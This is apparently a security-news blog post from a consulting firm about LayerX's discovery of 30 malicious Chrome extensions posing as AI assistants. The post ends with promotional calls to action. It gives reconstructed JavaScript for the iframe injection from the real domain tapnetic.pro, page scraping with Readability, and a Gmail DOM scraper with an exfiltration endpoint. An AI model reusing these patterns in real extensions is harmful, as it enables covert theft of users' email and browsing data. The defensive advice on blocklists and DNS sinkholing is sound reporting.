
260,000 People Installed "AI Assistant" Chrome Extensions That Were Stealing Their Data

Don Ho

Last updated: February 2, 2026


Security firm LayerX discovered 30 malicious Chrome extensions disguised as AI assistants for ChatGPT, Claude, Gemini, and Grok — installed by over 260,000 users — that injected hidden iframes, extracted page content from every website visited, read Gmail messages directly from the DOM, and exfiltrated everything to a command-and-control server. Several of these extensions were “Featured” by the Chrome Web Store.

Google’s own curation process gave them a trust badge while they were actively stealing user data. Meanwhile, Google shut down a lawyer’s NotebookLM account over a terms-of-service technicality. The priorities are telling.

How the Attack Worked

LayerX named the campaign “AiFrame.” All 30 extensions shared identical code architecture, permissions, and backend infrastructure despite having different names, branding, and Chrome Web Store listings. This is a technique called extension spraying: publish the same malicious code under multiple identities so that when one gets taken down, the others survive.

The core mechanism was an iframe injection. When a user installed the extension and opened a new tab or clicked the extension icon, it loaded a full-screen iframe from a remote server (a subdomain of tapnetic.pro themed to match the fake AI brand). This iframe looked like a legitimate AI chat interface. Behind the scenes, it had full access to the extension’s permissions.
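A hypothetical reconstruction of that injection step, based on LayerX’s description: tapnetic.pro is the real command-and-control domain, but the per-brand subdomain scheme and function names here are illustrative assumptions.

```javascript
// Sketch of the AiFrame injection step (illustrative, not the actual code).
const C2_DOMAIN = "tapnetic.pro";

// e.g. remoteFrameUrl("chatgpt") -> "https://chatgpt.tapnetic.pro/"
// Each fake brand got its own themed subdomain.
function remoteFrameUrl(brand) {
  return `https://${brand}.${C2_DOMAIN}/`;
}

// Runs in the extension's new-tab page: fill the viewport with a remote
// iframe so the user sees what looks like a native AI chat interface.
function injectFrame(doc, brand) {
  const frame = doc.createElement("iframe");
  frame.src = remoteFrameUrl(brand);
  frame.style.cssText =
    "position:fixed;inset:0;width:100vw;height:100vh;border:none";
  doc.body.appendChild(frame);
  return frame;
}
```

Because the iframe’s contents come from the attacker’s server, everything the user sees can change at any time without a new extension version.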

The extension could extract readable content from any page the user was viewing using Mozilla’s Readability library. It pulled titles, text content, excerpts, and metadata. That means if you were looking at an internal company document, a confidential email, or a client portal, the extension could read it and send it to the attacker’s server.
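A sketch of that extraction step, assuming the Readability class is bundled with the extension; the fields shown match Readability’s documented `parse()` result, but the function itself is illustrative.

```javascript
// Hypothetical sketch of the page-scraping step. Readability mutates the
// document it parses, so callers pass a clone of the live DOM.
// Assumes the Readability class is bundled with the extension package.
function extractPage(doc) {
  const article = new Readability(doc.cloneNode(true)).parse();
  if (!article) return null; // non-article pages can fail to parse
  return {
    url: doc.location.href,
    title: article.title,       // page title
    excerpt: article.excerpt,   // short summary/metadata
    text: article.textContent,  // full readable text of the page
  };
}
```

The output is small, structured JSON: exactly the shape you would want if you were exfiltrating page content at scale rather than summarizing it for the user.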

Gmail Was the Primary Target

Fifteen of the 30 extensions specifically targeted Gmail. Each included a dedicated content script that ran on mail.google.com at document load. The script injected UI elements into Gmail’s interface and used MutationObserver (a browser API that watches for page changes) to persistently monitor the email interface.

The Gmail module read email content directly from the DOM. It extracted message text from conversation views using textContent selectors. When users invoked “AI-assisted” features like email summarization or reply drafting, the extension sent the full email thread to the tapnetic.pro backend.
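The pattern LayerX describes can be sketched as follows; the selector and endpoint here are invented for illustration, but the mechanism (a MutationObserver re-scraping `textContent` as Gmail re-renders) is the one the report documents.

```javascript
// Hypothetical sketch of the Gmail content-script pattern. Endpoint and
// selector are illustrative assumptions, not values from the report.
const EXFIL_ENDPOINT = "https://mail.tapnetic.pro/collect";

// Collect visible thread text from conversation-view message nodes.
function scrapeThread(rootNode) {
  return Array.from(rootNode.querySelectorAll("[data-message-id]"))
    .map((n) => n.textContent.trim())
    .filter(Boolean);
}

// Gmail is a single-page app, so a MutationObserver fires on every
// navigation, newly opened thread, and incoming message.
function watchInbox(rootNode, onMessages) {
  const observer = new MutationObserver(() => onMessages(scrapeThread(rootNode)));
  observer.observe(rootNode, { childList: true, subtree: true });
  return observer;
}
```

No Gmail API, no OAuth prompt, no audit trail on Google’s side: the script simply reads what the user’s own browser has already rendered.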

Think about what’s in your Gmail: client communications, contract drafts, financial information, login credentials, password reset links, HR correspondence. This extension had access to all of it. These are the kinds of real-world AI safety risks that most organizations haven’t begun to account for.

Google’s Review Process Failed

The Chrome Web Store has a review process for extensions before they’re published. Several of these malicious extensions passed that review and received “Featured” status, which is supposed to indicate a higher level of trust and quality.

The extensions evaded detection because their malicious behavior was delivered remotely. The code that ran inside the iframe was hosted on the attacker’s server, not in the extension package that Google reviewed. When Google analyzed the extension code at submission time, it looked clean. The actual surveillance functionality loaded later from tapnetic.pro.

This is a known weakness in browser extension security. The extension requests broad permissions (access to all URLs, ability to read page content), which many legitimate extensions also require. The actual malicious behavior lives on a server that can be updated without pushing a new extension version through Google’s review.
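A minimal sketch of what such a package can look like at review time (Manifest V3; all field values are illustrative). Nothing in it is overtly malicious; the surveillance arrives later from the remote origin the new-tab page embeds.

```json
{
  "manifest_version": 3,
  "name": "AI Chat Assistant",
  "version": "1.0.0",
  "permissions": ["storage", "scripting", "tabs"],
  "host_permissions": ["<all_urls>"],
  "chrome_url_overrides": { "newtab": "newtab.html" },
  "content_scripts": [
    { "matches": ["https://mail.google.com/*"], "js": ["gmail.js"] }
  ]
}
```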

LayerX also documented active evasion of Chrome Web Store enforcement. When Google removed one extension (ID: fppbiomdkfbhgjjdmojlogeceejinadg) on February 6, 2025, an identical extension appeared under a new ID (gghdfkafnhfpaooiolhncejnlgglhkhe) two weeks later. Same code, same permissions, same infrastructure. Different name.

The Enterprise Risk

This isn’t just a consumer problem. Employees install Chrome extensions on work machines. Many companies don’t restrict or audit browser extensions through their endpoint management. A single employee installing a “Claude AI Assistant” extension to help draft emails could expose the company’s entire Gmail environment to a third-party attacker.

The risk multiplies with remote work. Personal devices accessing corporate Gmail, employees installing productivity tools without IT approval, browser extensions that bypass network-level security controls. Your CASB doesn’t inspect iframe content loaded by a browser extension. Your DLP tool doesn’t flag data exfiltration through a WebSocket connection from an extension to a remote server. And GitHub Copilot’s default opt-out for code training shows this pattern isn’t limited to shady extensions — even legitimate tools are routing your data places you didn’t authorize. The Perplexity class action shows the same data exfiltration pattern at the platform level: AI tools routing user data to third parties without consent.

What to Do Now

Audit your organization’s browser extensions immediately. Chrome Enterprise and Microsoft Endpoint Manager both offer extension management capabilities. Pull a list of every extension installed across your fleet. Cross-reference against known malicious extension IDs (LayerX published the full list in their research).

Restrict extension installation by policy. Use Chrome’s ExtensionInstallBlocklist and ExtensionInstallAllowlist policies to control which extensions employees can install. Consider requiring IT approval for any extension that requests broad permissions like “Read and change all your data on all websites.”
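On Linux, for example, these policies can be set in a managed-policy file such as `/etc/opt/chrome/policies/managed/extensions.json` (path and allowlist entry below are illustrative): block everything by default, then allow only vetted IDs.

```json
{
  "ExtensionInstallBlocklist": ["*"],
  "ExtensionInstallAllowlist": ["replace-with-an-approved-extension-id"]
}
```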

Block tapnetic.pro and its subdomains at the network and DNS level. Add the domain to your firewall blocklist and DNS sinkhole. If any endpoints are already communicating with this domain, treat those machines as compromised.
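With a dnsmasq-style resolver, for instance, a single address rule sinkholes the domain and every subdomain; note that plain hosts-file entries do not cover subdomains, so resolver-level blocking is the safer sketch.

```
# dnsmasq: resolve tapnetic.pro and all of its subdomains to an unroutable address
address=/tapnetic.pro/0.0.0.0
```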

Managing this risk at scale takes a structured AI compliance stack with a guardrails layer that covers shadow AI tools.

Don’t trust Chrome Web Store “Featured” badges. Google’s review process is not a security guarantee. It’s a quality signal at best. Evaluate extensions based on their permissions, code transparency, developer reputation, and independent security analysis. A badge from Google means Google looked at it. It doesn’t mean Google caught everything.

Shadow AI is already in your browser. Take the ACRA to identify the AI tools your employees are using without approval.

The 260,000 users who installed these extensions thought they were getting AI productivity tools. They got surveillance. Your employees might be among them.

Kaizen AI Labs

Ready to Deploy AI in Your Business?

Schedule a discovery call with our AI consulting team. We'll map your operations, identify leverage points, and show you exactly where AI moves the needle.

Book a Consulting Call

Adjacent Media by Kaizen Labs

Is Your Brand Visible to the Bots?

Get a free GEO audit and find out if your brand is being cited, found, or completely invisible in AI-generated answers. Then let's fix it.

Get a Free GEO Audit